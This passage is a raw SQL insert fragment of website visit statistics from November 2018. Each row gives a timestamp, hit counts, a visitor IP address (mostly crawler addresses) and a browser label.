.36.148.105','other'),(330969,1542089398,1,1,0,0,'54.36.148.186','other'),(330970,1542089821,2,2,0,0,'91.209.11.236','other'),(330971,1542089900,1,1,0,0,'54.36.149.84','other'),(330972,1542090277,1,1,0,0,'207.46.13.156','other'),(330973,1542090568,1,1,0,0,'54.36.148.224','other'),(330974,1542090817,1,1,0,0,'54.36.148.50','other'),(330975,1542090860,8,8,0,0,'216.244.66.241','other'),(330976,1542091230,1,1,0,0,'54.36.148.108','other'),(330977,1542091283,1,1,0,0,'157.55.39.144','other'),(330978,1542091284,1,1,0,0,'54.36.148.79','other'),(330979,1542091451,1,0,1,0,'66.249.66.42',''),(330980,1542091911,1,1,0,0,'54.36.148.157','other'),(330981,1542092112,1,1,0,0,'216.244.66.241','other'),(330982,1542092358,1,1,0,0,'95.163.255.96','other'),(330983,1542092362,1,1,0,0,'95.163.255.94','other'),(330984,1542092390,1,1,0,0,'40.77.167.177','other'),(330985,1542092437,1,1,0,0,'66.249.66.154','chrome'),(330986,1542092451,1,1,0,0,'54.36.149.18','other'),(330987,1542092679,1,1,0,0,'54.36.149.45','other'),(330988,1542092713,1,1,0,0,'66.249.66.155','chrome'),(330989,1542092719,1,1,0,0,'66.249.66.152','chrome'),(330990,1542092961,1,1,0,0,'66.249.66.40','chrome'),(330991,1542093048,1,1,0,0,'54.36.148.183','other'),(330992,1542093234,1,1,0,0,'54.36.148.157','other'),(330993,1542093286,1,1,0,0,'8.29.198.25','other'),(330994,1542093452,2,2,0,0,'91.196.178.83','chrome'),(330995,1542093477,2,2,0,0,'130.180.217.255','chrome'),(330996,1542093572,2,2,0,0,'216.244.66.241','other'),(330997,1542093650,2,2,0,0,'91.209.11.236','other'),(330998,1542093722,1,1,0,0,'54.36.148.47','other'),(330999,1542094142,1,1,0,0,'66.249.66.157','chrome'),(331000,1542094143,1,1,0,0,'66.249.66.156','chrome'),(331001,1542094155,1,1,0,0,'54.36.148.232','other'),(331002,1542094495,1,1,0,0,'66.249.66.155','chrome'),(331003,1542094640,1,0,1,0,'66.249.66.42',''),(331004,1542094702,1,1,0,0,'54.36.148.226','other'),(331005,1542094742,1,1,0,0,'54.36.148.185','other'),(331006,1542094876,1,1,0,0,'54.36.149.75','other'),(331007,1542094884,2,2,0,0,'8.29.198.26','other'),(331008,1542094905,2,2,0,0,'91.196.178.93','chrome'),(331009,1542094954,1,1,0,0,'54.36.148.176','other'),(331010,1542094955,1,1,0,0,'54.36.148.39','other'),(331011,1542095137,1,1,0,0,'91.196.178.83','chrome'),(331012,1542095207,1,1,0,0,'207.46.13.190','other'),(331013,1542095209,7,7,0,0,'216.244.66.241','other'),(331014,1542095611,1,1,0,0,'54.36.148.184','other'),(331015,1542096361,1,1,0,0,'46.229.168.129','other'),(331016,1542096440,1,1,0,0,'54.36.148.238','other'),(331017,1542096488,1,1,0,0,'54.36.148.134','other'),(331018,1542096742,1,1,0,0,'5.9.158.195','other'),(331019,1542096977,1,1,0,0,'54.36.148.29','other'),(331020,1542097014,1,1,0,0,'66.102.9.35','chrome'),(331022,1542097069,1,1,0,0,'54.36.148.254','other'),(331023,1542097254,1,1,0,0,'54.36.149.21','other'),(331024,1542097363,1,1,0,0,'66.249.66.157','chrome'),(331025,1542097369,1,1,0,0,'54.36.148.110','other'),(331026,1542097416,1,1,0,0,'54.36.148.152','other'),(331027,1542097548,2,2,0,0,'195.230.119.58','chrome'),(331028,1542097611,1,1,0,0,'66.249.66.154','chrome'),(331029,1542097628,1,0,1,0,'66.249.66.44',''),(331030,1542097642,2,2,0,0,'66.249.66.152','chrome'),(331031,1542097688,2,2,0,0,'91.209.11.236','other'),(331032,1542097730,1,1,0,0,'54.36.148.209','other'),(331033,1542098451,1,1,0,0,'54.36.148.248','other'),(331034,1542098456,1,1,0,0,'46.229.168.148','other'),(331035,1542098646,1,1,0,0,'54.36.149.50','other'),(331036,1542098723,1,1,0,0,'54.36.148.158','other'),(331037,1542098727,1,1,0,0,'54.36.148.49','other'),(331038,1542098792,1,1,0,0,'54.36.148.85','other'),(331039,1542098829,2,2,0,0,'216.244.66.241','other'),(331040,1542098868,1,1,0,0,'66.249.66.156','chrome'),(331041,1542098869,1,1,0,0,'66.249.66.154','chrome'),(331042,1542098951,2,2,0,0,'95.213.141.126','opera'),(331043,1542099095,2,2,0,0,'195.34.207.54','opera'),(331044,1542099145,1,1,0,0,'54.36.148.119','other'),(331045,1542099373,1,1,0,0,'178.95.219.231','chrome'),(331046,1542099374,1,1,0,0,'54.36.148.170','other'),(331047,1542099513,1,1,0,0,'54.36.148.155','other'),(331048,1542099809,1,1,0,0,'54.36.148.177','other'),(331049,1542099899,5,5,0,0,'91.196.178.93','chrome'),(331050,1542100105,1,1,0,0,'91.196.177.13','chrome'),(331051,1542100263,1,1,0,0,'54.36.148.54','other'),(331052,1542100358,4,4,0,0,'216.244.66.241','other'),(331053,1542100365,1,1,0,0,'54.36.148.29','other'),(331054,1542100486,1,1,0,0,'46.229.168.150','other'),(331055,1542100488,1,1,0,0,'46.229.168.148','other'),(331056,1542100744,1,1,0,0,'91.196.178.132','chrome'),(331057,1542100842,2,2,0,0,'95.132.26.252','firefox'),(331058,1542101315,1,1,0,0,'66.249.66.44','chrome'),(331059,1542101390,1,1,0,0,'194.146.191.204','chrome'),(331060,1542101417,1,1,0,0,'54.36.148.71','other'),(331061,1542101492,1,1,0,0,'54.36.148.68','other'),(331062,1542101524,1,1,0,0,'54.36.148.254','other'),(331063,1542101584,1,1,0,0,'54.36.148.57','other'),(331064,1542101692,3,3,0,0,'216.244.66.241','other'),(331065,1542101981,1,1,0,0,'46.229.168.151','other'),(331066,1542101997,1,1,0,0,'54.36.149.54','other'),(331067,1542102005,2,2,0,0,'91.196.177.46','firefox'),(331068,1542102125,1,1,0,0,'207.46.13.156','other'),(331069,1542102874,1,1,0,0,'54.36.148.111','other'),(331070,1542103024,1,1,0,0,'66.249.66.152','chrome'),(331071,1542103033,1,1,0,0,'54.36.148.153','other'),(331072,1542103775,2,2,0,0,'216.244.66.241','other'),(331073,1542103965,1,1,0,0,'46.229.168.143','other'),(331074,1542103968,1,1,0,0,'46.229.168.147','other'),(331075,1542104082,1,1,0,0,'54.36.148.83','other'),(331076,1542104132,1,1,0,0,'54.36.148.220','other'),(331077,1542104145,1,1,0,0,'8.29.198.25','other'),(331078,1542104375,1,1,0,0,'54.36.149.105','other'),(331079,1542104483,1,1,0,0,'54.36.149.74','other'),(331080,1542104772,1,1,0,0,'157.55.39.144','other'),(331081,1542104837,1,1,0,0,'66.249.66.157','chrome'),(331083,1542104974,1,1,0,0,'54.36.148.94','other'),(331084,1542105098,1,1,0,0,'54.36.148.75','other'),(331085,1542105128,1,1,0,0,'54.36.148.38','other'),(331086,1542105217,1,1,0,0,'46.229.168.147','other'),(331087,1542105311,1,1,0,0,'54.36.149.95','other'),(331088,1542105575,3,3,0,0,'91.124.182.170','firefox'),(331089,1542105724,1,1,0,0,'8.29.198.27','other'),(331090,1542105852,4,4,0,0,'91.209.11.236','other'),(331091,1542105887,1,1,0,0,'54.36.149.85','other'),(331092,1542105972,1,1,0,0,'91.196.179.138','chrome'),(331093,1542106149,1,1,0,0,'46.229.168.137','other'),(331094,1542106153,1,1,0,0,'46.229.168.140','other'),(331095,1542106264,1,1,0,0,'178.94.47.62','firefox'),(331096,1542106306,1,1,0,0,'8.29.198.26','other'),(331097,1542106313,2,2,0,0,'216.244.66.241','other'),(331098,1542106651,1,1,0,0,'54.36.149.41','other'),(331099,1542106781,1,1,0,0,'178.255.215.94','other'),(331100,1542106939,1,1,0,0,'54.36.148.65','other'),(331101,1542107346,1,1,0,0,'54.36.148.42','other'),(331102,1542107515,1,1,0,0,'54.36.149.32','other'),(331103,1542107547,1,1,0,0,'54.36.148.90','other'),(331104,1542107930,1,1,0,0,'54.36.148.217','other'),(331105,1542107946,2,2,0,0,'216.244.66.241','other'),(331106,1542107964,1,1,0,0,'95.163.255.92','other'),(331107,1542107967,1,1,0,0,'95.163.255.98','other'),(331108,1542108005,1,1,0,0,'54.36.149.59','other'),(331109,1542108024,2,2,0,0,'194.44.236.82','firefox'),(331110,1542108529,1,1,0,0,'54.36.148.112','other'),(331111,1542108602,3,3,0,0,'95.134.220.225','chrome'),(331112,1542108867,1,1,0,0,'207.46.13.172','other'),(331113,1542109178,1,1,0,0,'54.36.149.45','other'),(331114,1542109278,2,2,0,0,'216.244.66.241','other'),(331115,1542109639,1,1,0,0,'54.36.149.48','other'),(331116,1542109871,1,1,0,0,'46.229.168.148','other'),(331117,1542110116,1,1,0,0,'46.229.168.136','other'),(331118,1542110158,2,2,0,0,'91.196.178.80','firefox'),(331119,1542110224,1,1,0,0,'54.36.148.123','other'),(331120,1542110296,1,1,0,0,'54.36.148.59','other'),(331121,1542110421,1,1,0,0,'54.36.149.16','other'),(331122,1542110560,1,1,0,0,'54.36.149.52','other'),(331123,1542110640,1,1,0,0,'54.36.148.33','other'),(331124,1542110801,1,1,0,0,'54.36.148.12','other'),(331125,1542111319,1,1,0,0,'46.229.168.133','other'),(331126,1542111347,4,4,0,0,'216.244.66.241','other'),(331127,1542111359,1,1,0,0,'54.36.148.129','other'),(331128,1542111496,2,2,0,0,'130.180.217.255','chrome'),(331129,1542111747,1,1,0,0,'93.183.215.120','chrome'),(331130,1542111820,1,1,0,0,'54.36.148.203','other'),(331131,1542111911,2,2,0,0,'66.249.66.156','chrome'),(331132,1542112066,1,1,0,0,'54.36.148.106','other'),(331133,1542112117,1,1,0,0,'66.249.66.154','chrome'),(331134,1542112134,1,1,0,0,'54.36.148.232','other'),(331135,1542112139,1,1,0,0,'54.36.149.106','other'),(331136,1542112173,1,1,0,0,'54.36.148.34','other'),(331137,1542112420,2,2,0,0,'91.196.178.93','chrome'),(331138,1542112642,1,1,0,0,'54.36.149.84','other'),(331139,1542112682,1,1,0,0,'54.36.149.5','other'),(331140,1542113209,2,2,0,0,'91.209.11.236','other'),(331141,1542113227,2,2,0,0,'94.179.208.46','chrome'),(331142,1542113338,1,1,0,0,'77.111.247.180','chrome'),(331143,1542113749,1,1,0,0,'54.36.148.43','other'),(331144,1542113775,1,1,0,0,'54.36.149.65','other'),(331145,1542113834,1,1,0,0,'54.36.148.51','other'),(331146,1542113961,2,2,0,0,'216.244.66.241','other'),(331147,1542114132,1,1,0,0,'66.249.66.44','chrome'),(331148,1542114133,1,1,0,0,'46.229.168.147','other'),(331149,1542114136,1,1,0,0,'46.229.168.138','other'),(331150,1542114158,1,1,0,0,'54.36.149.42','other'),(331151,1542114190,1,1,0,0,'46.229.168.142','other'),(331152,1542114252,2,2,0,0,'66.249.66.152','chrome'),(331153,1542114491,2,2,0,0,'91.196.178.93','chrome'),(331154,1542114605,1,1,0,0,'66.249.66.156','chrome'),(331155,1542114673,1,1,0,0,'95.163.255.96','other'),(331156,1542114676,1,1,0,0,'95.163.255.95','other'),(331157,1542115009,1,1,0,0,'8.29.198.27','other'),(331158,1542115374,1,1,0,0,'195.34.207.54','opera'),(331159,1542115660,1,1,0,0,'54.36.148.77','other'),(331160,1542115677,1,1,0,0,'95.163.255.96','other'),(331161,1542115680,1,1,0,0,'95.163.255.98','other'),(331162,1542115941,1,1,0,0,'54.36.148.254','other'),(331163,1542116190,1,1,0,0,'130.180.216.139','chrome'),(331164,1542116526,1,1,0,0,'54.36.148.29','other'),(331165,1542116569,2,2,0,0,'8.29.198.25','other'),(331166,1542116637,1,1,0,0,'85.203.27.118','other'),(331167,1542116696,5,5,0,0,'216.244.66.241','other'),(331168,1542116702,1,1,0,0,'54.36.149.1','other'),(331169,1542116757,1,1,0,0,'54.36.148.33','other'),(331170,1542117315,2,2,0,0,'91.196.178.129','firefox'),(331171,1542117320,1,1,0,0,'173.212.229.76','other'),(331172,1542117366,1,1,0,0,'46.201.175.135','chrome'),(331173,1542117440,1,1,0,0,'54.36.148.96','other'),(331174,1542117798,1,1,0,0,'40.77.167.177','other'),(331175,1542117884,1,1,0,0,'216.244.66.241','other'),(331176,1542118318,1,1,0,0,'46.229.168.148','other'),(331177,1542118417,1,1,0,0,'46.229.168.136','other'),(331178,1542118486,1,1,0,0,'54.36.149.20','other'),(331179,1542118709,1,1,0,0,'54.36.149.93','other'),(331180,1542118761,1,1,0,0,'54.36.148.13','other'),(331181,1542118777,1,1,0,0,'207.46.13.172','other'),(331182,1542118885,1,1,0,0,'54.36.148.26','other'),(331183,1542119099,1,1,0,0,'207.46.13.156','other'),(331184,1542119115,1,1,0,0,'46.229.168.152','other'),(331185,1542119177,2,2,0,0,'216.244.66.241','other'),(331186,1542119179,1,1,0,0,'54.36.148.21','other'),(331187,1542119469,1,1,0,0,'54.36.149.64','other'),(331188,1542119490,2,2,0,0,'66.249.66.156','chrome'),(331189,1542119618,4,4,0,0,'85.115.62.180','chrome'),(331190,1542119840,1,1,0,0,'46.164.130.92','firefox'),(331191,1542120182,1,1,0,0,'66.249.66.154','chrome'),(331192,1542120229,1,1,0,0,'54.36.149.25','other'),(331193,1542120273,1,1,0,0,'54.36.148.109','other'),(331194,1542120293,1,1,0,0,'54.36.149.63','other'),(331195,1542120349,1,1,0,0,'54.36.148.30','other'),(331196,1542120367,2,2,0,0,'194.44.236.82','firefox'),(331197,1542120417,1,1,0,0,'54.36.148.79','other'),(331198,1542120914,2,2,0,0,'94.179.53.224','firefox'),(331199,1542121061,1,1,0,0,'62.205.134.182','other'),(331200,1542121146,1,1,0,0,'66.249.66.42','chrome'),(331201,1542121157,1,1,0,0,'66.249.66.40','chrome'),(331202,1542121319,1,1,0,0,'217.77.222.164','chrome'),(331203,1542121328,1,1,0,0,'54.36.148.217','other'),(331204,1542121347,1,1,0,0,'40.77.167.177','other'),(331205,1542121354,1,1,0,0,'54.36.148.44','other'),(331206,1542121485,4,4,0,0,'216.244.66.241','other'),(331207,1542121637,4,4,0,0,'91.209.11.236','other'),(331208,1542122098,1,1,0,0,'54.36.149.41','other'),(331209,1542122166,1,1,0,0,'54.36.148.140','other'),(331210,1542122355,1,1,0,0,'46.229.168.148','other'),(331211,1542122356,1,1,0,0,'46.229.168.153','other'),(331212,1542122494,1,1,0,0,'54.36.148.238','other'),(331213,1542122532,1,1,0,0,'54.36.149.64','other'),(331214,1542122583,1,1,0,0,'66.249.66.155','chrome'),(331215,1542122610,1,1,0,0,'46.229.168.132','other'),(331216,1542122699,1,1,0,0,'54.36.148.38','other'),(331217,1542122778,1,1,0,0,'54.36.148.37','other'),(331218,1542122837,1,1,0,0,'54.36.149.101','other'),(331219,1542122868,1,1,0,0,'54.36.148.193','other'),(331220,1542122877,2,2,0,0,'66.249.66.152','chrome'),(331221,1542122939,1,1,0,0,'66.249.66.154','chrome'),(331222,1542123013,1,1,0,0,'54.36.149.4','other'),(331223,1542123265,1,1,0,0,'54.36.149.57','other'),(331224,1542123770,1,1,0,0,'54.36.149.103','other'),(331225,1542123876,1,1,0,0,'54.36.148.224','other'),(331226,1542123964,2,2,0,0,'216.244.66.241','other'),(331227,1542124184,1,1,0,0,'54.36.149.83','other'),(331228,1542124190,1,1,0,0,'54.36.149.32','other'),(331229,1542124262,1,1,0,0,'54.36.149.62','other'),(331230,1542124353,1,1,0,0,'54.36.148.28','other'),(331231,1542124569,1,1,0,0,'54.36.149.46','other'),(331232,1542124648,1,1,0,0,'54.36.148.231','other'),(331233,1542124767,1,1,0,0,'54.36.149.3','other'),(331234,1542125061,1,1,0,0,'54.36.149.26','other'),(331235,1542125081,1,1,0,0,'54.36.148.251','other'),(331236,1542125110,1,1,0,0,'54.36.148.204','other'),(331237,1542125706,1,1,0,0,'54.36.148.75','other'),(331238,1542125758,1,1,0,0,'66.249.66.152','chrome'),(331239,1542125846,1,1,0,0,'54.36.149.63','other'),(331240,1542125852,1,1,0,0,'8.29.198.27','other'),(331241,1542125859,1,1,0,0,'54.36.148.102','other'),(331242,1542125873,1,1,0,0,'54.36.148.215','other'),(331243,1542125885,1,1,0,0,'54.36.149.100','other'),(331244,1542126305,1,1,0,0,'54.36.149.40','other'),(331245,1542126330,1,1,0,0,'54.36.149.102','other'),(331246,1542126413,1,1,0,0,'54.36.148.247','other'),(331247,1542126437,1,1,0,0,'54.36.149.80','other'),(331248,1542126505,1,1,0,0,'54.36.148.57','other'),(331249,1542126563,1,1,0,0,'46.229.168.138','other'),(331250,1542126575,1,1,0,0,'54.36.148.231','other'),(331251,1542126629,4,4,0,0,'216.244.66.241','other'),(331252,1542127100,8,8,0,0,'144.76.40.222','other'),(331253,1542127345,1,1,0,0,'46.229.168.151','other'),(331254,1542127348,1,1,0,0,'46.229.168.147','other'),(331255,1542127410,1,1,0,0,'8.29.198.26','other'),(331256,1542127666,1,1,0,0,'54.36.149.105','other'),(331257,1542127711,1,1,0,0,'46.229.168.143','other'),(331258,1542127716,1,1,0,0,'46.229.168.144','other'),(331259,1542127782,1,1,0,0,'95.163.255.99','other'),(331260,1542127785,1,1,0,0,'54.36.148.138','other'),(331261,1542127786,1,1,0,0,'95.163.255.97','other'),(331262,1542127867,1,1,0,0,'54.36.148.62','other'),(331263,1542127987,1,1,0,0,'8.29.198.27','other'),(331264,1542128028,1,1,0,0,'66.249.66.156','chrome'),(331265,1542128033,1,1,0,0,'54.36.149.61','other'),(331266,1542128057,1,1,0,0,'180.76.15.20','other'),(331267,1542128450,4,4,0,0,'91.209.11.236','other'),(331268,1542128813,1,1,0,0,'54.165.59.7','other'),(331269,1542129012,1,1,0,0,'54.36.148.128','other'),(331270,1542129396,2,2,0,0,'216.244.66.241','other'),(331271,1542129644,1,1,0,0,'54.36.148.47','other'),(331272,1542129896,1,1,0,0,'54.36.149.48','other'),(331273,1542130057,1,1,0,0,'180.76.15.28','other'),(331274,1542130058,1,1,0,0,'180.76.15.154','other'),(331275,1542130132,1,1,0,0,'54.36.148.115','other'),(331276,1542130262,1,1,0,0,'66.249.66.157','chrome'),(331277,1542130263,1,1,0,0,'66.249.66.152','chrome'),(331278,1542130301,1,1,0,0,'66.249.66.146','chrome'),(331279,1542130627,7,7,0,0,'148.251.120.201','other'),(331280,1542130637,1,1,0,0,'46.229.168.139','other'),(331281,1542130732,1,1,0,0,'54.36.148.109','other'),(331282,1542130900,1,1,0,0,'54.36.148.221','other'),(331283,1542130931,1,1,0,0,'46.229.168.129','other'),(331284,1542131264,1,1,0,0,'95.163.255.94','other'),(331285,1542131267,1,1,0,0,'95.163.255.98','other'),(331286,1542131646,1,1,0,0,'46.229.168.148','other'),(331287,1542131650,1,1,0,0,'46.229.168.133','other'),(331288,1542131790,3,3,0,0,'216.244.66.241','other'),(331289,1542132044,1,1,0,0,'66.249.66.154','chrome'),(331290,1542132342,1,1,0,0,'46.229.168.136','other'),(331291,1542132462,1,1,0,0,'54.36.148.129','other'),(331292,1542132585,1,1,0,0,'66.249.66.152','chrome'),(331293,1542133159,1,1,0,0,'54.36.148.151','other'),(331294,1542133302,1,1,0,0,'54.36.148.239','other'),(331295,1542133332,1,1,0,0,'91.196.178.47','chrome'),(331296,1542133576,4,4,0,0,'216.244.66.241','other'),(331297,1542133581,1,1,0,0,'54.36.149.31','other'),(331298,1542133802,1,1,0,0,'66.249.66.156','chrome'),(331299,1542133831,1,1,0,0,'46.229.168.143','other'),(331300,1542133833,1,1,0,0,'46.229.168.135','other'),(331301,1542133914,2,2,0,0,'66.249.66.154','chrome'),(331302,1542134210,1,1,0,0,'54.36.149.4','other'),(331303,1542134272,1,1,0,0,'46.229.168.136','other'),(331304,1542134322,2,2,0,0,'91.209.11.236','other'),(331305,1542134323,1,1,0,0,'54.36.148.247','other'),(331306,1542134424,1,1,0,0,'54.36.148.85','other'),(331307,1542135006,1,1,0,0,'95.163.255.108','other'),(331308,1542135013,1,1,0,0,'95.163.255.104','other'),(331309,1542135110,1,1,0,0,'54.36.148.53','other'),(331310,1542135507,1,1,0,0,'46.211.113.164','chrome'),(331311,1542135829,1,1,0,0,'54.36.149.17','other'),(331312,1542135859,1,1,0,0,'46.229.168.150','other'),(331313,1542136040,1,1,0,0,'54.36.148.33','other'),(331314,1542136149,1,1,0,0,'54.36.148.24','other'),(331315,1542136263,1,1,0,0,'188.163.35.253','chrome'),(331316,1542136399,1,1,0,0,'54.36.149.19','other'),(331317,1542136414,1,1,0,0,'54.36.149.65','other'),(331318,1542136426,1,1,0,0,'54.36.148.226','other'),(331319,1542136600,1,1,0,0,'54.36.148.224','other'),(331320,1542136726,1,1,0,0,'8.29.198.25','other'),(331321,1542136751,8,8,0,0,'216.244.66.241','other'),(331322,1542136802,1,1,0,0,'54.36.148.52','other'),(331323,1542136849,1,1,0,0,'54.36.148.83','other'),(331324,1542136987,2,2,0,0,'178.154.244.29','other'),(331325,1542136988,2,2,0,0,'178.154.244.11','other'),(331326,1542137075,1,1,0,0,'54.36.148.154','other'),(331327,1542137210,1,1,0,0,'46.229.168.138','other'),(331328,1542137212,1,1,0,0,'46.229.168.133','other'),(331329,1542137435,1,1,0,0,'54.36.148.252','other'),(331330,1542137496,1,1,0,0,'66.249.66.44','chrome'),(331331,1542137716,1,1,0,0,'54.36.148.86','other'),(331332,1542137820,1,1,0,0,'66.249.66.152','chrome'),(331333,1542137941,1,1,0,0,'54.36.149.52','other'),(331334,1542137957,1,1,0,0,'46.229.168.136','other'),(331335,1542137959,1,1,0,0,'46.229.168.135','other'),(331336,1542138022,1,1,0,0,'54.36.149.29','other'),(331337,1542138250,2,2,0,0,'8.29.198.27','other'),(331338,1542138301,1,1,0,0,'46.229.168.132','other'),(331339,1542138328,1,1,0,0,'46.229.168.134','other'),(331340,1542138346,1,1,0,0,'54.36.148.139','other'),(331341,1542138679,1,1,0,0,'13.66.139.0','other'),(331342,1542139013,1,1,0,0,'207.46.13.169','other'),(331343,1542139037,2,2,0,0,'216.244.66.241','other'),(331344,1542139884,1,1,0,0,'66.249.66.156','chrome'),(331345,1542139886,1,1,0,0,'54.36.148.247','other'),(331346,1542139945,1,1,0,0,'46.229.168.130','other'),(331347,1542140009,1,1,0,0,'216.244.66.241','other'),(331348,1542140274,1,1,0,0,'54.36.149.7','other'),(331349,1542140463,1,1,0,0,'54.36.148.51','other'),(331350,1542140550,1,1,0,0,'54.36.148.184','other'),(331351,1542140630,1,1,0,0,'54.36.148.114','other'),(331352,1542140732,1,1,0,0,'54.36.148.208','other'),(331353,1542140912,1,1,0,0,'46.229.168.153','other'),(331354,1542140914,1,1,0,0,'46.229.168.129','other'),(331355,1542141105,1,1,0,0,'207.46.13.156','other'),(331356,1542141147,1,1,0,0,'54.36.148.192','other'),(331357,1542141351,1,1,0,0,'54.36.149.100','other'),(331358,1542141465,1,1,0,0,'66.249.66.152','chrome'),(331359,1542141548,1,1,0,0,'46.229.168.140','other'),(331360,1542141551,1,1,0,0,'46.229.168.144','other'),(331361,1542141615,1,1,0,0,'54.36.149.36','other'),(331362,1542141667,1,1,0,0,'54.36.148.108','other'),(331363,1542142008,1,1,0,0,'54.36.148.109','other'),(331364,1542142105,1,1,0,0,'157.55.39.212','other'),(331365,1542142184,1,1,0,0,'95.132.63.43','chrome'),(331366,1542142247,2,2,0,0,'216.244.66.241','other'),(331367,1542142420,1,1,0,0,'54.36.148.216','other'),(331368,1542142717,1,1,0,0,'54.36.149.7','other'),(331369,1542142916,1,1,0,0,'54.36.149.50','other'),(331370,1542142967,1,1,0,0,'54.36.148.26','other'),(331371,1542143147,1,1,0,0,'54.36.148.55','other'),(331372,1542143338,1,1,0,0,'216.244.66.241','other'),(331373,1542143368,1,1,0,0,'54.36.148.10','other'),(331374,1542143531,1,1,0,0,'54.36.148.229','other'),(331375,1542143552,1,1,0,0,'54.36.148.169','other'),(331376,1542143572,1,1,0,0,'54.36.148.176','other'),(331377,1542143698,4,4,0,0,'91.209.11.236','other'),(331378,1542143812,1,1,0,0,'207.46.13.172','other'),(331379,1542143956,1,1,0,0,'54.36.149.86','other'),(331380,1542144048,1,0,1,0,'66.249.66.61',''),(331382,1542144327,1,1,0,0,'54.36.149.8','other'),(331383,1542144451,1,1,0,0,'216.244.66.241','other'),(331384,1542144600,1,1,0,0,'46.229.168.141','other'),(331385,1542144604,1,1,0,0,'46.229.168.134','other'),(331386,1542145014,1,1,0,0,'46.229.168.132','other'),(331387,1542145019,1,1,0,0,'46.229.168.144','other'),(331388,1542145098,1,1,0,0,'54.36.148.190','other'),(331389,1542145135,1,1,0,0,'54.36.148.181','other'),(331390,1542145155,1,1,0,0,'54.36.148.63','other'),(331391,1542145182,1,1,0,0,'54.36.149.74','other'),(331392,1542145191,1,1,0,0,'54.36.149.46','other'),(331393,1542145503,1,1,0,0,'54.36.148.20','other'),(331394,1542145588,1,1,0,0,'54.36.148.101','other'),(331395,1542145809,1,1,0,0,'54.36.148.59','other'),(331396,1542146172,1,1,0,0,'54.36.148.225','other'),(331397,1542146249,1,1,0,0,'207.46.13.169','other'),(331398,1542146422,1,1,0,0,'54.36.148.10','other'),(331399,1542146558,1,1,0,0,'54.36.149.32','other'),(331400,1542146761,1,1,0,0,'54.36.148.65','other'),(331401,1542146807,4,4,0,0,'216.244.66.241','other'),(331402,1542146847,1,1,0,0,'157.55.39.212','other'),(331403,1542147245,1,1,0,0,'54.36.148.164','other'),(331404,1542147307,1,1,0,0,'54.36.149.18','other'),(331405,1542147583,1,1,0,0,'8.29.198.25','other'),(331406,1542147763,2,2,0,0,'91.209.11.236','other'),(331407,1542148208,1,1,0,0,'54.36.149.30','other'),(331408,1542148295,1,1,0,0,'66.249.66.155','chrome'),(331409,1542148313,1,1,0,0,'66.249.66.154','chrome'),(331410,1542148793,1,1,0,0,'54.36.148.140','other'),(331411,1542148993,1,1,0,0,'66.249.66.44','chrome'),(331412,1542149105,1,1,0,0,'8.29.198.27','other'),(331413,1542149134,1,1,0,0,'54.36.148.50','other'),(331414,1542149363,1,1,0,0,'54.36.149.100','other'),(331415,1542149465,1,1,0,0,'54.36.148.175','other'),(331416,1542149549,1,1,0,0,'54.36.148.160','other'),(331417,1542149684,1,1,0,0,'8.29.198.25','other'),(331418,1542149697,1,1,0,0,'216.244.66.241','other'),(331419,1542149874,1,1,0,0,'54.36.148.73','other'),(331420,1542150138,1,1,0,0,'54.36.148.78','other'),(331421,1542150416,1,1,0,0,'54.36.149.7','other'),(331422,1542150529,1,1,0,0,'54.36.148.227','other'),(331423,1542150578,1,1,0,0,'54.36.148.245','other'),(331424,1542150732,1,1,0,0,'46.229.168.129','other'),(331425,1542150832,1,1,0,0,'54.36.149.38','other'),(331426,1542150982,1,1,0,0,'46.229.168.130','other'),(331427,1542150984,1,1,0,0,'46.229.168.144','other'),(331428,1542151063,1,1,0,0,'66.249.66.154','chrome'),(331429,1542151176,1,1,0,0,'54.36.148.71','other'),(331430,1542151455,1,1,0,0,'207.46.13.169','other'),(331431,1542151547,2,2,0,0,'91.209.11.236','other'),(331432,1542151612,1,1,0,0,'54.36.148.117','other'),(331433,1542151766,1,1,0,0,'54.36.149.80','other'),(331434,1542151939,1,1,0,0,'54.36.148.142','other'),(331435,1542151956,1,1,0,0,'54.36.148.154','other'),(331436,1542152209,4,4,0,0,'216.244.66.241','other'),(331437,1542152266,1,1,0,0,'54.36.149.15','other'),(331438,1542152273,1,1,0,0,'54.36.149.54','other'),(331439,1542152318,1,1,0,0,'54.36.148.187','other'),(331440,1542152462,1,1,0,0,'66.249.66.59','chrome'),(331441,1542152463,1,1,0,0,'66.249.66.40','chrome'),(331442,1542153037,1,1,0,0,'54.36.148.41','other'),(331443,1542153082,1,1,0,0,'54.36.149.12','other'),(331444,1542153161,1,1,0,0,'54.36.149.78','other'),(331445,1542153254,1,1,0,0,'54.36.148.230','other'),(331446,1542153322,1,1,0,0,'178.175.135.101','other'),(331447,1542153355,1,1,0,0,'207.46.13.169','other'),(331448,1542153374,1,1,0,0,'54.36.148.75','other'),(331449,1542153775,1,1,0,0,'54.36.148.107','other'),(331450,1542154387,1,1,0,0,'102.165.37.114','other'),(331451,1542154399,1,1,0,0,'54.36.148.77','other'),(331452,1542154578,6,6,0,0,'216.244.66.241','other'),(331453,1542154614,1,1,0,0,'54.36.148.50','other'),(331454,1542154662,1,1,0,0,'46.229.168.140','other'),(331455,1542154735,1,1,0,0,'54.36.149.45','other'),(331456,1542154849,1,1,0,0,'46.229.168.148','other'),(331457,1542154850,1,1,0,0,'46.229.168.150','other'),(331458,1542154919,1,1,0,0,'54.36.148.219','other'),(331459,1542155625,1,1,0,0,'54.36.148.179','other'),(331460,1542155638,1,1,0,0,'54.36.148.26','other'),(331461,1542155968,2,2,0,0,'91.209.11.236','other'),(331462,1542156032,1,1,0,0,'54.36.148.218','other'),(331463,1542156192,2,2,0,0,'158.46.154.72','chrome'),(331464,1542156514,1,1,0,0,'207.46.13.172','other'),(331465,1542156650,1,1,0,0,'54.36.149.18','other'),(331466,1542157377,1,1,0,0,'216.244.66.241','other'),(331467,1542157502,1,1,0,0,'46.229.168.138','other'),(331468,1542157997,1,1,0,0,'66.249.66.156','chrome'),(331469,1542157998,1,1,0,0,'66.249.66.152','chrome'),(331470,1542158008,1,1,0,0,'54.36.148.166','other'),(331471,1542158015,1,1,0,0,'54.36.149.67','other'),(331472,1542158175,1,1,0,0,'54.36.148.243','other'),(331473,1542158431,1,1,0,0,'8.29.198.27','other'),(331474,1542158471,1,1,0,0,'54.36.148.156','other'),(331475,1542158622,1,1,0,0,'157.55.39.212','other'),(331476,1542158969,1,1,0,0,'54.36.148.209','other'),(331477,1542159454,1,1,0,0,'54.36.148.103','other'),(331478,1542159650,1,1,0,0,'46.229.168.151','other'),(331479,1542159652,1,1,0,0,'46.229.168.146','other'),(331480,1542159677,1,1,0,0,'54.36.148.95','other'),(331481,1542159877,1,1,0,0,'54.36.148.101','other'),(331482,1542159885,4,4,0,0,'216.244.66.241','other'),